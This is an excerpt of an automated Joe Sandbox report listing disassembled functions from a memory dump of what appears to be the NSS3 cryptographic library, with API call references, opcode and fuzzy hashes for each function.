Part of subcall function 6CADCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CADCD93,?), ref: 6CADCF1D

Part of subcall function 6CADCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CADCD93,?), ref: 6CADCF47
Part of subcall function 6CADCEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CADCD93,?), ref: 6CADCF67
Part of subcall function 6CADCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6CADCD93,?,?,?,?,?,?,?,?,?,?,?,6CADCD93,?), ref: 6CADCF78

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
String ID:
API String ID: 3748922049-0
Opcode ID: 47f9430e4db85e80b1b5bef493b7a192a1b2e3c4f66220351d037b27f0651f83
Instruction ID: 854ee683527315c192da8324d0b876d9a1657f479b1c5f9fd7a16c65f4577749
Opcode Fuzzy Hash: 47f9430e4db85e80b1b5bef493b7a192a1b2e3c4f66220351d037b27f0651f83
Instruction Fuzzy Hash: F351E3B6A001019BE710DF69DD40BEA73F5AF4834CF6A0524D94897741EF31F988CB91

Function 6CAAEEF0 Relevance: 9.1, APIs: 6, Instructions: 124threadCOMMON

Download Yara Rule

APIs

PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6CAAEF38

Part of subcall function 6CA99520: PK11_IsLoggedIn.NSS3(00000000,?,6CAC379E,?,00000001,?), ref: 6CA99542

PK11_Authenticate.NSS3(?,00000001,?), ref: 6CAAEF53

Part of subcall function 6CAB4C20: TlsGetValue.KERNEL32 ref: 6CAB4C4C
Part of subcall function 6CAB4C20: EnterCriticalSection.KERNEL32(?), ref: 6CAB4C60
Part of subcall function 6CAB4C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CAB4CA1
Part of subcall function 6CAB4C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CAB4CBE
Part of subcall function 6CAB4C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CAB4CD2
Part of subcall function 6CAB4C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAB4D3A

PR_GetCurrentThread.NSS3 ref: 6CAAEF9E

Part of subcall function 6CB39BF0: TlsGetValue.KERNEL32(?,?,?,6CB80A75), ref: 6CB39C07

free.MOZGLUE(00000000), ref: 6CAAEFC3
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CAAF016
free.MOZGLUE(00000000), ref: 6CAAF022

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
String ID:
API String ID: 2459274275-0
Opcode ID: 5075bb279367876c2f319f64be7fc3a6607d56e05b09188e01671818e860aef3
Instruction ID: e82edd73331c1f82ab4c5f11aea579a53eab3de540a09974509f82e05d49b732
Opcode Fuzzy Hash: 5075bb279367876c2f319f64be7fc3a6607d56e05b09188e01671818e860aef3
Instruction Fuzzy Hash: D5417171E00209AFDF018FE9DC45AEE7AB9EB48358F044029F914A7350E771D9568BA1

Function 6CA84860 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA84894

Part of subcall function 6CACB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBA18D0,?), ref: 6CACB095

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA848CA
SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA848DD
SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?), ref: 6CA848FF
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CA84912
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA8494A

Part of subcall function 6CB1C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB1C2BF

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Util$AlgorithmTag_$DecodeErrorItem_Quick$Value
String ID:
API String ID: 759476665-0
Opcode ID: 582e7d6f7e2928263c76700b702afc7773c3b0e640aa78f580a547b6945bcbf8
Instruction ID: 7689880cd3cf08d4d02ac9f941c50ec7d441f9be3b7060f31ebe142055b2ae8c
Opcode Fuzzy Hash: 582e7d6f7e2928263c76700b702afc7773c3b0e640aa78f580a547b6945bcbf8
Instruction Fuzzy Hash: 6641E470A063459BE710CF69D894B6B73EC9F44318F48052CFA5587741F771D988CB92

Function 6CA9CF40 Relevance: 9.1, APIs: 6, Instructions: 112memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000060), ref: 6CA9CF80
SECITEM_DupItem_Util.NSS3(?), ref: 6CA9D002
PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,?,00000000), ref: 6CA9D016
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA9D025
PR_NewLock.NSS3 ref: 6CA9D043
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CA9D074

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: ErrorUtil$Alloc_ContextDestroyItem_K11_Lock
String ID:
API String ID: 3361105336-0
Opcode ID: cfd461460a4c44e8cc266f70462368ec84867467f2cf96ee3ae51ceec8572caf
Instruction ID: 3a0bb594374f821d6bf16ea5d76f74212e875eca42b6f81d67392ac51f3c1698
Opcode Fuzzy Hash: cfd461460a4c44e8cc266f70462368ec84867467f2cf96ee3ae51ceec8572caf
Instruction Fuzzy Hash: DC41AEB0E113118FDB10DF29C88679ABBE4AF08318F14416ADC1E8BB46D774D8C9CBA1

Function 6CAD8810 Relevance: 9.1, APIs: 6, Instructions: 110memorythreadCOMMON

Download Yara Rule

APIs

PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,?,6CAD86AA), ref: 6CAD8851

Part of subcall function 6CAD1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6CA7895A,00000000,?,00000000,?,00000000,?,00000000,?,6CA6F599,?,00000000), ref: 6CAD136A
Part of subcall function 6CAD1340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6CA7895A,00000000,?,00000000,?,00000000,?,00000000,?,6CA6F599,?,00000000), ref: 6CAD137E
Part of subcall function 6CAD1340: PL_ArenaGrow.NSS3(?,6CA6F599,?,00000000,?,6CA7895A,00000000,?,00000000,?,00000000,?,00000000,?,6CA6F599,?), ref: 6CAD13CF
Part of subcall function 6CAD1340: PR_Unlock.NSS3(?,?,6CA7895A,00000000,?,00000000,?,00000000,?,00000000,?,6CA6F599,?,00000000), ref: 6CAD145C

PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,6CAD86AA), ref: 6CAD886C
PORT_ArenaAlloc_Util.NSS3(?,0000002C), ref: 6CAD8890
PR_GetCurrentThread.NSS3 ref: 6CAD891C
PR_GetCurrentThread.NSS3 ref: 6CAD8937

Part of subcall function 6CB39BF0: TlsGetValue.KERNEL32(?,?,?,6CB80A75), ref: 6CB39C07

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Arena$Util$Alloc_CurrentThreadValue$CriticalEnterGrowGrow_SectionUnlock
String ID:
API String ID: 3779483720-0
Opcode ID: 6b83d1d780cf75ed80d90111aa5c3d8f49e0d1ef94d6cf2c036fb5a1ee26471c
Instruction ID: 433b4a7ef8900240446c65700c1a7ca5ebf75da0c6303c0a82aa02243e16b23b
Opcode Fuzzy Hash: 6b83d1d780cf75ed80d90111aa5c3d8f49e0d1ef94d6cf2c036fb5a1ee26471c
Instruction Fuzzy Hash: E641B6B0A012029FE704CF69C890B65B7A4FF44318F159269D8688B751EB71F9A4CBD1

Function 6CAE8890 Relevance: 9.1, APIs: 6, Instructions: 106COMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(00000004,?), ref: 6CAE88C0
PK11_HashBuf.NSS3(00000003,?,?,?), ref: 6CAE88E0
NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6CAE8915
HASH_ResultLenByOidTag.NSS3(00000000), ref: 6CAE8928
PK11_HashBuf.NSS3(00000000,?,?,?), ref: 6CAE8957
PK11_HashBuf.NSS3(00000004,?,?,?), ref: 6CAE8980

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: HashK11_$AlgorithmPolicy$Result
String ID:
API String ID: 2238172455-0
Opcode ID: 35c05c6e01bea9a599ad1e4405bfcf3488a7855538a619ad0cce4c453fa2c3bc
Instruction ID: 8b325bf7c7dea10b13e0877f229b8fbe8bd98fa4068c0b2e99c26a934d82d189
Opcode Fuzzy Hash: 35c05c6e01bea9a599ad1e4405bfcf3488a7855538a619ad0cce4c453fa2c3bc
Instruction Fuzzy Hash: 9431E872D04159ABEB008EEC9D41BAF73989B09318F040136EE1497B81F7319A98D3E3

Function 6CA82E60 Relevance: 9.1, APIs: 6, Instructions: 105COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6CA72D1A), ref: 6CA82E7E

Part of subcall function 6CAD07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CA78298,?,?,?,6CA6FCE5,?), ref: 6CAD07BF
Part of subcall function 6CAD07B0: PL_HashTableLookup.NSS3(?,?), ref: 6CAD07E6
Part of subcall function 6CAD07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CAD081B
Part of subcall function 6CAD07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CAD0825

PR_Now.NSS3 ref: 6CA82EDF
CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6CA82EE9
SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6CA72D1A), ref: 6CA82F01
CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6CA72D1A), ref: 6CA82F50
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6CA82F81

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
String ID:
API String ID: 287051776-0
Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction ID: 5d544661aa7ab205b566548b710a99e70d1220f9c2455922892c589306941b7e
Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction Fuzzy Hash: 0A31D3715031408BE714CE59DD4CBBEB265EF80318F684B7AD42997AD0EB319CDAC621

Function 6CA70E00 Relevance: 9.1, APIs: 6, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

CERT_DecodeAVAValue.NSS3(?,?,6CA70A2C), ref: 6CA70E0F
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6CA70A2C), ref: 6CA70E73
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6CA70A2C), ref: 6CA70E85
PORT_ZAlloc_Util.NSS3(00000001,?,?,6CA70A2C), ref: 6CA70E90
free.MOZGLUE(00000000), ref: 6CA70EC4
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6CA70A2C), ref: 6CA70ED9

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
String ID:
API String ID: 3618544408-0
Opcode ID: 6b1a9ef77f764eb67efbc4ff90173f43f4a0dbe7ac02789e3aa724c35713f75e
Instruction ID: a047cd130190cbbfb765a4d2b3d4cf3433e0c3952d208ae3a2ad11e71ddfcd58
Opcode Fuzzy Hash: 6b1a9ef77f764eb67efbc4ff90173f43f4a0dbe7ac02789e3aa724c35713f75e
Instruction Fuzzy Hash: B9212E7AA002845BEB2045665C45B6F72BFFBC1648F1D4035E81893B41EA62D8D982B1

Function 6CA5A9B0 Relevance: 9.1, APIs: 6, Instructions: 101synchronizationCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,?,6CB39270), ref: 6CA5A9BF
PR_IntervalToMilliseconds.NSS3(?,?,6CB39270), ref: 6CA5A9DE

Part of subcall function 6CA5AB40: __aulldiv.LIBCMT ref: 6CA5AB66

Part of subcall function 6CB3CA40: LeaveCriticalSection.KERNEL32(?), ref: 6CB3CAAB

LeaveCriticalSection.KERNEL32(?), ref: 6CA5AA2C
WaitForSingleObject.KERNEL32(?,-00000001), ref: 6CA5AA39
EnterCriticalSection.KERNEL32(?), ref: 6CA5AA42
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6CA5AAEB

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: CriticalSection$LeaveObjectSingleWait$EnterIntervalMillisecondsValue__aulldiv
String ID:
API String ID: 4008047719-0
Opcode ID: 32d5b4c47ac852a1a9ebf6ebff7769a2dd95687aef71294ccf91724bd37e208e
Instruction ID: 0b2e48c817dd51ecb8a2717e47f07161625516f6b7c7265d3ab10722b8906608
Opcode Fuzzy Hash: 32d5b4c47ac852a1a9ebf6ebff7769a2dd95687aef71294ccf91724bd37e208e
Instruction Fuzzy Hash: 0D418D747047058FD7009F28C5847A6BBB2FB0A328F68C62DE55A8B641DB719DD1CBA0

Function 6CA888D0 Relevance: 9.1, APIs: 6, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CA90725,00000000,00000058), ref: 6CA88906
EnterCriticalSection.KERNEL32(?), ref: 6CA8891A
PL_ArenaAllocate.NSS3(?,?), ref: 6CA8894A
calloc.MOZGLUE(00000001,6CA9072D,00000000,00000000,00000000,?,6CA90725,00000000,00000058), ref: 6CA88959
memset.VCRUNTIME140(?,00000000,?), ref: 6CA88993
PR_Unlock.NSS3(?), ref: 6CA889AF

Part of subcall function 6CA607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C9F204A), ref: 6CA607AD
Part of subcall function 6CA607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C9F204A), ref: 6CA607CD
Part of subcall function 6CA607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C9F204A), ref: 6CA607D6
Part of subcall function 6CA607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C9F204A), ref: 6CA607E4
Part of subcall function 6CA607A0: TlsSetValue.KERNEL32(00000000,?,6C9F204A), ref: 6CA60864
Part of subcall function 6CA607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA60880
Part of subcall function 6CA607A0: TlsSetValue.KERNEL32(00000000,?,?,6C9F204A), ref: 6CA608CB
Part of subcall function 6CA607A0: TlsGetValue.KERNEL32(?,?,6C9F204A), ref: 6CA608D7
Part of subcall function 6CA607A0: TlsGetValue.KERNEL32(?,?,6C9F204A), ref: 6CA608FB

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Value$calloc$AllocateArenaCriticalEnterSectionUnlockmemset
String ID:
API String ID: 1716546843-0
Opcode ID: fea933d60c144f669b92b2e69c74dad1f8e98180583d117a0814d4c5de9ffab9
Instruction ID: 5dd3ac61aa0556f53b451a9fd43a93e8ca6ebfa7d739c316766d0bb3a20f2701
Opcode Fuzzy Hash: fea933d60c144f669b92b2e69c74dad1f8e98180583d117a0814d4c5de9ffab9
Instruction Fuzzy Hash: 42310472E02115ABD7009F68CC45A5AB7A8EF0535CF198526EC1897B41EB31E9C5C7D2

Function 6CA7AE50 Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6CA7AEB3
SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6CA7AECA
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CA7AEDD
PR_SetError.NSS3(FFFFE022,00000000), ref: 6CA7AF02
SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6CB99500), ref: 6CA7AF23

Part of subcall function 6CACF080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6CACF0C8
Part of subcall function 6CACF080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CACF122

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CA7AF37

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
String ID:
API String ID: 3714604333-0
Opcode ID: 93b5dfccf4734046ad6beaeaf77f240ffcae003b0f89eaaa2be72d98e32b13bb
Instruction ID: c9b78d40bbec38745d96416012a5473188948345a87ec7d5301b9de24c9d7d0a
Opcode Fuzzy Hash: 93b5dfccf4734046ad6beaeaf77f240ffcae003b0f89eaaa2be72d98e32b13bb
Instruction Fuzzy Hash: 92212B769092006BEB204F18DC41B5A77A5BF8572CF144318FC589B780E731D98887B3

Function 6CAFEE50 Relevance: 9.1, APIs: 6, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CAFEE85
realloc.MOZGLUE(D3B61396,?), ref: 6CAFEEAE
PORT_Alloc_Util.NSS3(?), ref: 6CAFEEC5

Part of subcall function 6CAD0BE0: malloc.MOZGLUE(6CAC8D2D,?,00000000,?), ref: 6CAD0BF8
Part of subcall function 6CAD0BE0: TlsGetValue.KERNEL32(6CAC8D2D,?,00000000,?), ref: 6CAD0C15

htonl.WSOCK32(?), ref: 6CAFEEE3
htonl.WSOCK32(00000000,?), ref: 6CAFEEED
memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6CAFEF01

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 1351805024-0
Opcode ID: 23a28869f1df9f69ead7368208c5f3a786a2dfef3f74802bd11c992b3bd0b30f
Instruction ID: a083428a4ff3f977835d8a515023d0ec4e978fa72d06cf84ab449b61e0ce9751
Opcode Fuzzy Hash: 23a28869f1df9f69ead7368208c5f3a786a2dfef3f74802bd11c992b3bd0b30f
Instruction Fuzzy Hash: EE21D331A00214AFDB109F28DC8079E77B4EF49758F158129FD299B645E330ED55CBE2

Function 6CAAEE30 Relevance: 9.1, APIs: 6, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CAAEE49

Part of subcall function 6CACFAB0: free.MOZGLUE(?,-00000001,?,?,6CA6F673,00000000,00000000), ref: 6CACFAC7

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CAAEE5C
PK11_CreateContextBySymKey.NSS3(?,00000104,?,?), ref: 6CAAEE77
PK11_CipherOp.NSS3(00000000,?,00000008,?,?,?), ref: 6CAAEE9D
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CAAEEB3

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
